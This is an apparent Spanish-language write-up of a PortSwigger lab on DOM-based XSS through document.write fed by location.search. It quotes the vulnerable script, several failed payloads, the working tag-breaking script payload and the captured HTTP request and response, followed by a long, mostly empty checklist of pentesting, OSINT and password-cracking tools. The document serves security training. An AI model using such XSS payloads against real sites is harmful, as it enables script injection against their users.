💀WRITEUP EXTENSO

👁️ RECONOCIMIENTO PASIVO ✔️

AUDITORIA DE: ((Laboratorio: DOM XSS en document.write el fregadero usando la fuente location.search))

RECONOCIMIENTO PASIVO

BROWSER👈 --------------------------------->https://www.paimon.com.ar/

ANALIZANDO SCRIPT DE JAVASCRIPT QUE MANEJA LAS BUSQUEDAS PARA MOSTRARLAS EN ELDOM O SITIO:



function trackSearch(query) {
        
            document.write('<img src="/resources/images/tracker.gif?searchTerms='+query+'">');
        }
        
        var query = (new URLSearchParams(window.location.search)).get('search');
        
        if(query) {
            trackSearch(query);
        }
                  
                  


PROBANDO EN EL BROWSER DISTINTOS PAYLOADS:

                  

https://0a6000e604685435839f87cc004a0084.web-security-academy.net/?search=%22%3Cscript%3Ealert(%27P4IM0N%27);%3C/script%3E  NO



https://0a6000e604685435839f87cc004a0084.web-security-academy.net/?search="<script>alert('P4IM0N');</script> NO



https://0a6000e604685435839f87cc004a0084.web-security-academy.net/?search="<scr<script>ipt>alert('P4IM0N');</scr</script>ipt>  NO


"<sscrcscrrscr<script>ipt>alert('P4IM0N');</sscrcscrrscr</script>ipt> NO


FUNCIONO:

https://0a6000e604685435839f87cc004a0084.web-security-academy.net/?search="><script>alert('¡P4IM0N-XSS!')</script> SI

CONCLUSION: LUEGO DE ANALIZAR EL SCRIPT Y COMO TRATA NUESTRA BUSQUEDA DENTRO DEL MISMO QUE CORRE SOBRE L MISMSO DOM, VEMOS QUE SI INGRESAMOS: "> CONJUNTAMENTE CON NUESTRO PAYLOAD : alert('¡P4IM0N-XSS!') , LO QUE LOGRAMOS HACER ES CERRAR LA RUTA DE SEARCHTERM Y CERRAR LA ETIQUETA IMG PARA QUE NUESTRO PAYLOAD SE EJECUTE E INGRESE EN EL DOM Y RESOLVIMOS EL LABORATORIO.

BROWSER👈 --------------------------------->https://www.paimon.com.ar/
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
BROWSER👈 --------------------------------->https://www.paimon.com.ar/
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
BROWSER👈 --------------------------------->https://www.paimon.com.ar/
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
NMAP👈 --------------------------------->https://nmap.org/ --->PDF-TOOL
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
NMAP👈 --------------------------------->https://nmap.org/ --->PDF-TOOL
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
WAYBACKMACHINE👈 --------------------------------->https://archive.org/web/
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
MALTEGO👈 --------------------------------->https://www.maltego.com/
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
SHODAN👈 --------------------------------->https://www.shodan.io/ --->PDF-TOOL
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
CENSYS👈 --------------------------------->https://search.censys.io/
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
WEB-CHECK👈 --------------------------------->https://web-check.xyz/
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
THEHARVESTER👈 --------------------------------->https://github.com/laramies/theHarvester
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
GOOGLE DORKS👈 --------------------------------->https://www.google.com/ --->PDF-TOOL
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
GOOGLE DORKS👈 --------------------------------->https://www.google.com/ --->PDF-TOOL
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
WAPPALYZER👈 --------------------------------->https://www.wappalyzer.com/
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
DNSdumpster👈 --------------------------------->https://dnsdumpster.com/
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
ROBTEX👈 --------------------------------->https://www.robtex.com/#google_vignette
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
WHOIS👈 --------------------------------->https://who.is/
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
NSLOOKUP👈 --------------------------------->https://www.nslookup.io/
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
GHUNT👈 --------------------------------->https://github.com/mxrch/GHunt
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
LLANTUN👈 --------------------------------->https://github.com/lesandcl/Llaitun
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
DISCOVER👈 --------------------------------->https://github.com/leebaird/discover
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
SHERLOCK👈 --------------------------------->https://github.com/sherlock-project/sherlock
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
WHATWEB👈 --------------------------------->https://www.kali.org/tools/whatweb/
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
DIAGRAMAS👈 --------------------------------->https://app.diagrams.net/
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
P4INformesmentales👈 --------------------------------->https://app.gitbook.com/o/7R5fPL7tMt73q9k0N7ZG/s/2rX5FvtpEjxBEKVG60XW/curso-hacking-con-python/tool-para-informes-de-mapas-mentales-p4informesmentales.py
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
COMPLETAR...👈 --------------------------------->https://www.paimon.com.ar/
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
COMPLETAR...👈 --------------------------------->https://www.paimon.com.ar/
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:

🟫🟫🟫🟫🟫🟫🟫🟫🟫🟫🟫🟫🟫🟫🟫🟫🟫🟫🟫🟫🟫🟫🟫🟫🟫🟫🟫🟫🟫🟫🟫🟫🟫🟫

🔬 ANALISIS FORENSE ❌

ANALISIS FORENSE

AUTOPSY👈 https://tools.kali.org/forensics/autopsy--->PDF-TOOL
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
AUTOPSY👈 https://tools.kali.org/forensics/autopsy--->PDF-TOOL
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
AUTOPSY👈 https://tools.kali.org/forensics/autopsy--->PDF-TOOL
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
VOLATILITY👈 https://github.com/volatilityfoundation/volatility--->PDF-TOOL
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
VOLATILITY👈 https://github.com/volatilityfoundation/volatility--->PDF-TOOL
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
VOLATILITY👈 https://github.com/volatilityfoundation/volatility--->PDF-TOOL
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
FTK👈 https://www.accessdata.com/products-services/forensic-toolkit-ftk--->PDF-TOOL
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
FTK👈 https://www.accessdata.com/products-services/forensic-toolkit-ftk--->PDF-TOOL
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
FTK👈 https://www.accessdata.com/products-services/forensic-toolkit-ftk--->PDF-TOOL
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
DFF👈 (Digital Forensics Framework) https://github.com/arxsys/dff
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
TSK👈 (The Sleuth Kit) https://tools.kali.org/forensics/sleuthkit
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
X-WAYS Forensics👈 https://www.x-ways.net/forensics/index-m.html
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
FOREMOST👈 https://github.com/korczis/foremost
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
HxD👈 https://mh-nexus.de/en/hxd/
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
HxD👈 https://mh-nexus.de/en/hxd/
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
WIRESHARK👈 --------------------------------->https://github.com/wireshark/wireshark --->PDF-TOOL
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
WIRESHARK👈 --------------------------------->https://github.com/wireshark/wireshark --->PDF-TOOL
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
WIRESHARK👈 --------------------------------->https://github.com/wireshark/wireshark --->PDF-TOOL
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
TSHARK👈 --------------------------------->https://www.kali.org/tools/wireshark/ --->PDF-TOOL
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
TSHARK👈 --------------------------------->https://www.kali.org/tools/wireshark/ --->PDF-TOOL
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
TSHARK👈 --------------------------------->https://www.kali.org/tools/wireshark/ --->PDF-TOOL
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
XXD👈 https://tools.kali.org/forensics/xxd
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
XXD👈 https://tools.kali.org/forensics/xxd
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
XXD👈 https://tools.kali.org/forensics/xxd
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
COMPLETAR...👈 --------------------------------->https://www.paimon.com.ar/
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
COMPLETAR...👈 --------------------------------->https://www.paimon.com.ar/
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:

🟦🟦🟦🟦🟦🟦🟦🟦🟦🟦🟦🟦🟦🟦🟦🟦🟦🟦🟦🟦🟦🟦🟦🟦🟦🟦🟦🟦🟦🟦🟦🟦🟦🟦

👊 RECONOCIMIENTO ACTIVO ✔️

RECONOCIMIENTO ACTIVO

PING👈 --------------------------------->https://www.kali.org/tools/fping/
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
NMAP👈 --------------------------------->https://nmap.org/ --->PDF-TOOL
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
NMAP👈 --------------------------------->https://nmap.org/ --->PDF-TOOL
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
NMAP👈 --------------------------------->https://nmap.org/ --->PDF-TOOL
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
NESSUS👈 --------------------------------->https://es-la.tenable.com/products/nessus/nessus-essentials
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
OPENVAS👈 --------------------------------->https://github.com/greenbone/openvas-scanner
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
NIKTO👈 --------------------------------->https://github.com/sullo/nikto
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
METASPLOIT👈 --------------------------------->https://www.metasploit.com/ --->PDF-TOOL
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
METASPLOIT👈 --------------------------------->https://www.metasploit.com/ --->PDF-TOOL
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
BURP SUITE👈 --------------------------------->https://portswigger.net/web-security --->PDF-TOOL
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:

BURP SUITE👈 --------------------------------->https://portswigger.net/web-security --->PDF-TOOL

REQUEST EN BUSQUEDA NORMAL:




GET /?search=elixir HTTP/2
Host: 0a6000e604685435839f87cc004a0084.web-security-academy.net
Cookie: session=SeBs4anKs7nJTgKJ2MfEbzg8FRcgEEC1
Cache-Control: max-age=0
Sec-Ch-Ua: "Chromium";v="118", "Google Chrome";v="118", "Not=A?Brand";v="99"
Sec-Ch-Ua-Mobile: ?0
Sec-Ch-Ua-Platform: "Linux"
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Referer: https://0a6000e604685435839f87cc004a0084.web-security-academy.net/
Accept-Encoding: gzip, deflate, br
Accept-Language: es-419,es;q=0.9,en;q=0.8
Connection: close




RESPONSE 


HTTP/2 200 OK
Content-Type: text/html; charset=utf-8
X-Frame-Options: SAMEORIGIN
Content-Length: 3654

<!DOCTYPE html>
<html>
    <head>
        <link href=/resources/labheader/css/academyLabHeader.css rel=stylesheet>
        <link href=/resources/css/labsBlog.css rel=stylesheet>
        <title>DOM XSS in document.write sink using source location.search</title>
    </head>
    <body>
        <script src="/resources/labheader/js/labHeader.js"></script>
        <div id="academyLabHeader">
            <section class='academyLabBanner'>
                <div class=container>
                    <div class=logo></div>
                        <div class=title-container>
                            <h2>DOM XSS in <code>document.write</code> sink using source <code>location.search</code></h2>
                            <a class=link-back href='https://portswigger.net/web-security/cross-site-scripting/dom-based/lab-document-write-sink'>
                                Back&nbsp;to&nbsp;lab&nbsp;description&nbsp;
                                <svg version=1.1 id=Layer_1 xmlns='http://www.w3.org/2000/svg' xmlns:xlink='http://www.w3.org/1999/xlink' x=0px y=0px viewBox='0 0 28 30' enable-background='new 0 0 28 30' xml:space=preserve title=back-arrow>
                                    <g>
                                        <polygon points='1.4,0 0,1.2 12.6,15 0,28.8 1.4,30 15.1,15'></polygon>
                                        <polygon points='14.3,0 12.9,1.2 25.6,15 12.9,28.8 14.3,30 28,15'></polygon>
                                    </g>
                                </svg>
                            </a>
                        </div>
                        <div class='widgetcontainer-lab-status is-notsolved'>
                            <span>LAB</span>
                            <p>Not solved</p>
                            <span class=lab-status-icon></span>
                        </div>
                    </div>
                </div>
            </section>
        </div>
        <div theme="blog">
            <section class="maincontainer">
                <div class="container is-page">
                    <header class="navigation-header">
                        <section class="top-links">
                            <a href=/>Home</a><p>|</p>
                        </section>
                    </header>
                    <header class="notification-header">
                    </header>
                    <section class=blog-header>
                        <h1>0 search results for 'elixir'</h1>
                        <hr>
                    </section>
                    <section class=search>
                        <form action=/ method=GET>
                            <input type=text placeholder='Search the blog...' name=search>
                            <button type=submit class=button>Search</button>
                        </form>
                    </section>
                    <script>
                        function trackSearch(query) {
                            document.write('<img src="/resources/images/tracker.gif?searchTerms='+query+'">');
                        }
                        var query = (new URLSearchParams(window.location.search)).get('search');
                        if(query) {
                            trackSearch(query);
                        }
                    </script>
                    <section class="blog-list no-results">
                        <div class=is-linkback>
        <a href="/">Back to Blog</a>
                        </div>
                    </section>
                </div>
            </section>
            <div class="footer-wrapper">
            </div>
        </div>
    </body>
</html>


------



REQUEST CON PAYLOAT ALERT:




GET /?search="><script>alert('¡P4IM0N-XSS!')</script> HTTP/2
Host: 0a6000e604685435839f87cc004a0084.web-security-academy.net
Cookie: session=SeBs4anKs7nJTgKJ2MfEbzg8FRcgEEC1
Cache-Control: max-age=0
Sec-Ch-Ua: "Chromium";v="118", "Google Chrome";v="118", "Not=A?Brand";v="99"
Sec-Ch-Ua-Mobile: ?0
Sec-Ch-Ua-Platform: "Linux"
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Referer: https://0a6000e604685435839f87cc004a0084.web-security-academy.net/
Accept-Encoding: gzip, deflate, br
Accept-Language: es-419,es;q=0.9,en;q=0.8

CONCLUSION: LUEGO DE ANALIZAR EL SCRIPT Y COMO TRATA NUESTRA BUSQUEDA DENTRO DEL MISMO QUE CORRE SOBRE L MISMSO DOM, VEMOS QUE SI INGRESAMOS: "> CONJUNTAMENTE CON NUESTRO PAYLOAD : alert('¡P4IM0N-XSS!') , LO QUE LOGRAMOS HACER ES CERRAR LA RUTA DE SEARCHTERM Y CERRAR LA ETIQUETA IMG PARA QUE NUESTRO PAYLOAD SE EJECUTE E INGRESE EN EL DOM Y RESOLVIMOS EL LABORATORIO.

BURP SUITE👈 --------------------------------->https://portswigger.net/web-security --->PDF-TOOL
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
OWASP ZAP👈 --------------------------------->https://github.com/zaproxy/zaproxy
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
WIRESHARK👈 --------------------------------->https://github.com/wireshark/wireshark --->PDF-TOOL
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
WIRESHARK👈 --------------------------------->https://github.com/wireshark/wireshark --->PDF-TOOL
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
DIRBUSTER👈 --------------------------------->https://github.com/KajanM/DirBuster
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
DIRBUSTER👈 --------------------------------->https://github.com/KajanM/DirBuster
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
SQLMAP👈 --------------------------------->https://github.com/sqlmapproject/sqlmap --->PDF-TOOL
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
SQLMAP👈 --------------------------------->https://github.com/sqlmapproject/sqlmap --->PDF-TOOL
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
WPSCAN👈 --------------------------------->https://wpscan.com/register/
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
JOOMSCAN👈 --------------------------------->https://www.kali.org/tools/joomscan/
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
GOBUSTER👈 --------------------------------->https://www.kali.org/tools/gobuster/
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
GOBUSTER👈 --------------------------------->https://www.kali.org/tools/gobuster/
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
FFUF👈 --------------------------------->https://www.kali.org/tools/ffuf/ --->PDF-TOOL
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
FFUF👈 --------------------------------->https://www.kali.org/tools/ffuf/ --->PDF-TOOL
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
TRACEROUTE👈 --------------------------------->https://www.kali.org/tools/traceroute/
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
SMBCLIENT👈 --------------------------------->https://www.kali.org/tools/samba/
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
SMBCLIENT👈 --------------------------------->https://www.kali.org/tools/samba/
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
SMBCLIENT👈 --------------------------------->https://www.kali.org/tools/samba/
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
TELNET👈 --------------------------------->https://wowgold-seller.com/es/stories/133-how-to-install-and-use-telnet-on-kali-linux
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
TELNET👈 --------------------------------->https://wowgold-seller.com/es/stories/133-how-to-install-and-use-telnet-on-kali-linux
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
TELNET👈 --------------------------------->https://wowgold-seller.com/es/stories/133-how-to-install-and-use-telnet-on-kali-linux
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
SSH👈 --------------------------------->https://www.kali.org/tools/openssh/ --->PDF-TOOL
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
SSH👈 --------------------------------->https://www.kali.org/tools/openssh/ --->PDF-TOOL
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
NETCAT👈 --------------------------------->https://www.kali.org/tools/netcat/ --->PDF-TOOL
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
FTP👈 --------------------------------->https://www.kali.org/tools/netkit-ftp/
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
FTP👈 --------------------------------->https://www.kali.org/tools/netkit-ftp/
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
FTP👈 --------------------------------->https://www.kali.org/tools/netkit-ftp/
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
TCPDUMP👈 --------------------------------->https://www.kali.org/tools/tcpdump/
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
TCPDUMP👈 --------------------------------->https://www.kali.org/tools/tcpdump/
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
TCPDUMP👈 --------------------------------->https://www.kali.org/tools/tcpdump/
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
TSHARK👈 --------------------------------->https://www.kali.org/tools/wireshark/ --->PDF-TOOL
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
TSHARK👈 --------------------------------->https://www.kali.org/tools/wireshark/ --->PDF-TOOL
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
TSHARK👈 --------------------------------->https://www.kali.org/tools/wireshark/ --->PDF-TOOL
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
BETTERCAP👈 --------------------------------->https://www.kali.org/tools/bettercap/ --->PDF-TOOL
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
SMBMAP👈 --------------------------------->https://www.kali.org/tools/smbmap/
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
SMBMAP👈 --------------------------------->https://www.kali.org/tools/smbmap/
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
WFUZZ👈 --------------------------------->https://www.kali.org/tools/wfuzz/
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
WFUZZ👈 --------------------------------->https://www.kali.org/tools/wfuzz/
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
BETTERCAP👈 --------------------------------->https://www.kali.org/tools/bettercap/ --->PDF-TOOL
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
COMMIX👈 --------------------------------->https://www.kali.org/tools/commix/
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
COMMIX👈 --------------------------------->https://www.kali.org/tools/commix/
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
SKIP-FISH👈 --------------------------------->https://www.kali.org/tools/skipfish/
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
WAPITI👈 --------------------------------->https://www.kali.org/tools/wapiti/
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
ETTERCAP👈 --------------------------------->https://www.kali.org/tools/ettercap/
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
WIFITE👈 --------------------------------->https://www.kali.org/tools/wifite/
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
SPOOFTOOPH👈 --------------------------------->https://www.kali.org/tools/spooftooph/
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
CRACKMAPEXEC👈 --------------------------------->https://www.kali.org/tools/crackmapexec/
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
COMPLETAR...👈 --------------------------------->https://www.paimon.com.ar/
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
COMPLETAR...👈 --------------------------------->https://www.paimon.com.ar/
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:

🟪🟪🟪🟪🟪🟪🟪🟪🟪🟪🟪🟪🟪🟪🟪🟪🟪🟪🟪🟪🟪🟪🟪🟪🟪🟪🟪🟪🟪🟪🟪🟪🟪🟪

🕵️ INVESTIGACION OSINT ❌

INVESTIGACION OSINT

OSINT Framework👈 --------------------------------->https://osintframework.com/
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
Maltego👈 --------------------------------->https://www.kali.org/tools/maltego/
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
Maltego👈 --------------------------------->https://www.kali.org/tools/maltego/
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
Recon-ng👈 --------------------------------->https://www.paimon.com.ar/
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
Recon-ng👈 --------------------------------->https://www.paimon.com.ar/
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
theHarvester👈 --------------------------------->https://www.kali.org/tools/theharvester/
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
theHarvester👈 --------------------------------->https://www.kali.org/tools/theharvester/
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
GOOGLE DORKS👈 --------------------------------->https://www.google.com/ --->PDF-TOOL
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
GOOGLE DORKS👈 --------------------------------->https://www.google.com/ --->PDF-TOOL
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
GOOGLE DORKS👈 --------------------------------->https://www.google.com/ --->PDF-TOOL
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
SHODAN👈 --------------------------------->https://www.shodan.io/ --->PDF-TOOL
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
OSRFrameworK👈 --------------------------------->https://www.kali.org/tools/osrframework/
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
SN0INT👈 --------------------------------->https://www.kali.org/tools/sn0int/
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
OSINTGRAM👈 --------------------------------->https://github.com/Datalux/Osintgram
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
TWOSINT👈 --------------------------------->https://github.com/falkensmz/tw1tter0s1nt
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
INTELLIGENCE X FACEBOOK👈 --------------------------------->https://intelx.io/tools?tab=facebook
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
INTELLIGENCE X PERSONAS👈 --------------------------------->https://intelx.io/tools?tab=person
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
INTELLIGENCE X TELEFONOS👈 --------------------------------->https://intelx.io/tools?tab=telephone
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
INTELLIGENCE X Ubicación 2 Mapa👈 --------------------------------->https://intelx.io/tools?tab=location
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
INTELLIGENCE X IMAGEN👈 --------------------------------->https://intelx.io/tools?tab=image
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
INTELLIGENCE X NOMBRE DE USUARIO👈 --------------------------------->https://intelx.io/tools?tab=username
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
INTELLIGENCE X HASH INVERSA👈 --------------------------------->https://intelx.io/tools?tab=hash
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
INTELLIGENCE X ARCHIVOS👈 --------------------------------->https://intelx.io/tools?tab=file
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
INTELLIGENCE X VIN VEHICULOS👈 --------------------------------->https://intelx.io/tools?tab=vin
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
COMPLETAR...👈 --------------------------------->https://www.paimon.com.ar/
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
COMPLETAR...👈 --------------------------------->https://www.paimon.com.ar/
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:

🟩🟩🟩🟩🟩🟩🟩🟩🟩🟩🟩🟩🟩🟩🟩🟩🟩🟩🟩🟩🟩🟩🟩🟩🟩🟩🟩🟩🟩🟩🟩🟩🟩🟩

⛓️ HASHES Y DESENCRIPTADOS ❌

HASHES Y DESENCRIPTADOS

JOHN THE RIPPER👈 --------------------------------->https://www.kali.org/tools/john/ --->PDF-TOOL
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
JOHN THE RIPPER👈 --------------------------------->https://www.kali.org/tools/john/ --->PDF-TOOL
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
JOHN THE RIPPER👈 --------------------------------->https://www.kali.org/tools/john/ --->PDF-TOOL
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
HASHCAT👈 --------------------------------->https://www.kali.org/tools/hashcat/
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
RAINBOWCRACK👈 --------------------------------->https://www.kali.org/tools/rainbowcrack/
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
OPHCRACK👈 --------------------------------->https://www.kali.org/tools/ophcrack/
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
CRACKSTATION👈 --------------------------------->https://crackstation.net/
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
AIRCRACK-NG👈 --------------------------------->https://www.kali.org/tools/aircrack-ng/ --->PDF-TOOL
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
AIRCRACK-NG👈 --------------------------------->https://www.kali.org/tools/aircrack-ng/ --->PDF-TOOL
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
CAIN Y ABEL👈 --------------------------------->https://github.com/xchwarze/Cain
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
HYDRA👈 --------------------------------->https://www.kali.org/tools/hydra/ --->PDF-TOOL
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
HYDRA👈 --------------------------------->https://www.kali.org/tools/hydra/ --->PDF-TOOL
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
HYDRA👈 --------------------------------->https://www.kali.org/tools/hydra/ --->PDF-TOOL
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
MEDUSA👈 --------------------------------->https://www.kali.org/tools/medusa/ --->PDF-TOOL
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
MEDUSA👈 --------------------------------->https://www.kali.org/tools/medusa/ --->PDF-TOOL
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
DAVEGRO1👈 --------------------------------->https://github.com/octomagon/davegrohl
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
ElcomSoft Distributed Password Recovery👈 --------------------------------->https://www.elcomsoft.es/edpr.html
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
CRACK RAR👈 --------------------------------->https://github.com/TermuxHackz/Crack-rar
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
CRACK NINJA RAR👈 --------------------------------->https://github.com/SHUR1K-N/RARNinja-RAR-Password-Cracking-Utility
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
NCRACK👈 --------------------------------->https://www.kali.org/tools/ncrack/
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
CEWL WORDLIST👈 --------------------------------->https://www.kali.org/tools/cewl/ --->PDF-TOOL
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
